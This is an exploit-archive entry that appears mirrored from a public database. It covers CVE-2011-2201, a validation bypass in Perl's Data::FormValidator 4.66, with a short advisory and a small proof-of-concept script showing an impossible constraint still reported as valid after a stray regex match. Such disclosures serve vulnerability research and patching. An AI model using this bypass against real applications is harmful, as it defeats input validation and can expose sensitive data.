[] NeoSense
E X P L O I T S
title author type platform port cve id

Perl Data::FormValidator 4.66 Module - 'results()' Security Bypass

Author: dst
type: remote
platform: linux
port: 
date_added: 2011-06-08 
date_updated: 2015-01-20 
verified: 1 
codes: CVE-2011-2201;OSVDB-72962 
tags: 
aliases:  
screenshot_url:  
application_url: 
source: https://www.securityfocus.com/bid/48167/info

The Perl Data::FormValidator module is prone to a security-bypass vulnerability.

An attacker can exploit this issue to bypass certain security restrictions and obtain potentially sensitive information.

Data::FormValidator 4.66 is vulnerable; other versions may also be affected.

#!/opt/perl/5.12/bin/perl

use strict;
use warnings;

use Data::FormValidator;

"some_unrelated_string" =~ m/^.*$/;

my $profile = {
untaint_all_constraints => 1,
required => [qw(a)],
constraint_methods => {
a => qr/will_never_match/,
},
};

my $results = Data::FormValidator->check({ a => 1 }, $profile);
warn $results->valid('a');
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.